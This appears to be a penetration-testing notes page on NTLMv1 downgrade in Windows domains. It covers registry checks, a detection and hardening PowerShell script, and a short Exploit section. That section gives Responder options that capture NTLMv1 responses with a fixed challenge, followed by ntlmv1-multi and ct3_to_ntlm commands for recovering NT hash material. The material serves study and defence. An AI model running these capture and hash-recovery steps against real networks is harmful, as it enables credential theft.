ntlmv1-downgrade.md

File metadata and controls

72 lines (45 loc) · 3.07 KB

NTLMv1 Downgrade

A client sends an NTLMv1 response when `LmCompatibilityLevel` exists and is 2 or lower; this can be further downgraded to "NTLMv1 w/o SSP" when `NtlmMinClientSec` is 0x20 or lower:

| Property Name | Property Path |
| --- | --- |
| LmCompatibilityLevel | HKLM\SYSTEM\CurrentControlSet\Control\Lsa |
| NtlmMinClientSec | HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0 |

## Check

Check with PowerShell:

```powershell
PS > (Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name LmCompatibilityLevel).LmCompatibilityLevel
2
PS > $decValue = (Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0\ -Name NtlmMinClientSec).NtlmMinClientSec
PS > $hexValue = "0x" + [string]::Format("{0:x}", $decValue)
PS > $hexValue
0x20
```

Check with Seatbelt (example):

```
Cmd > .\Seatbelt.exe NTLMSettings
```
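
The two manual checks above can be folded into one script that reads both values, reports whether the host still sends NTLMv1 and whether the "w/o SSP" downgrade applies, and applies the hardened settings. This is an added example, not part of the original notes; it assumes an elevated local PowerShell session and tests the `0x00080000` bit of `NtlmMinClientSec` (the "Require NTLMv2 session security" flag) rather than the "0x20 or lower" shorthand used above.

```powershell
# Added example (not from the original notes): classify a host's NTLM client
# settings from the two registry values above and optionally apply the fix.
# Assumptions: run locally in an elevated PowerShell; bit 0x00080000 of
# NtlmMinClientSec is the "Require NTLMv2 session security" flag.
function Test-Ntlmv1Downgrade {
    $lsa   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $msv10 = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'

    # Both values are optional. A missing LmCompatibilityLevel is treated as
    # "not downgradable" to match the wording above ("exists and is 2 or lower").
    $lmLevel = (Get-ItemProperty -Path $lsa -Name LmCompatibilityLevel `
                -ErrorAction SilentlyContinue).LmCompatibilityLevel
    $minSec  = (Get-ItemProperty -Path $msv10 -Name NtlmMinClientSec `
                -ErrorAction SilentlyContinue).NtlmMinClientSec
    if ($null -eq $minSec) { $minSec = 0 }

    $sendsNtlmv1 = ($null -ne $lmLevel) -and ($lmLevel -le 2)
    # ESS (NTLMv2 session security) is only enforced when bit 0x00080000 is set.
    $essRequired = (($minSec -band 0x00080000) -ne 0)

    [pscustomobject]@{
        LmCompatibilityLevel = $lmLevel
        NtlmMinClientSec     = ('0x{0:x8}' -f [int]$minSec)
        SendsNtlmv1          = $sendsNtlmv1
        DowngradeToNoSsp     = ($sendsNtlmv1 -and -not $essRequired)
    }
}

# Remediation: send NTLMv2 only (level 5) and require NTLMv2 session security
# plus 128-bit encryption (0x20080000) for the NTLM SSP client. Supports -WhatIf.
function Set-NtlmClientHardening {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    $lsa   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $msv10 = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
    if ($PSCmdlet.ShouldProcess($lsa, 'Set LmCompatibilityLevel=5')) {
        Set-ItemProperty -Path $lsa -Name LmCompatibilityLevel -Value 5 -Type DWord
    }
    if ($PSCmdlet.ShouldProcess($msv10, 'Set NtlmMinClientSec=0x20080000')) {
        Set-ItemProperty -Path $msv10 -Name NtlmMinClientSec -Value 0x20080000 -Type DWord
    }
}

# Report the current state; run Set-NtlmClientHardening -WhatIf to preview the fix.
Test-Ntlmv1Downgrade | Format-List
```

In a domain these values are normally delivered by the "Network security: LAN Manager authentication level" and "Minimum session security for NTLM SSP based clients" policies, so a local change will be overwritten at the next policy refresh unless the GPO itself is corrected.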

## Exploit

{% content-ref url="/pentest/infrastructure/ad/authentication-coercion.md" %} authentication-coercion.md {% endcontent-ref %}

Exploit with Responder using a known challenge of 1122334455667788 (see Authentication Coercion for ways to trigger callbacks):

```
$ sudo ./Responder.py -I eth0 -v --lm --disable-ess
```

## ntlmv1-multi + crack.sh

Calculate the token:

```
$ python ntlmv1.py --ntlmv1 '<NTLMv1_RESPONSE_STRING>'
```

Recover the final 2 bytes (4 hex characters) of the NT hash from the third DES block (CT3) and the known challenge:

```
$ ~/tools/hashcat-utils/src/ct3_to_ntlm.bin <CT3> 1122334455667788
```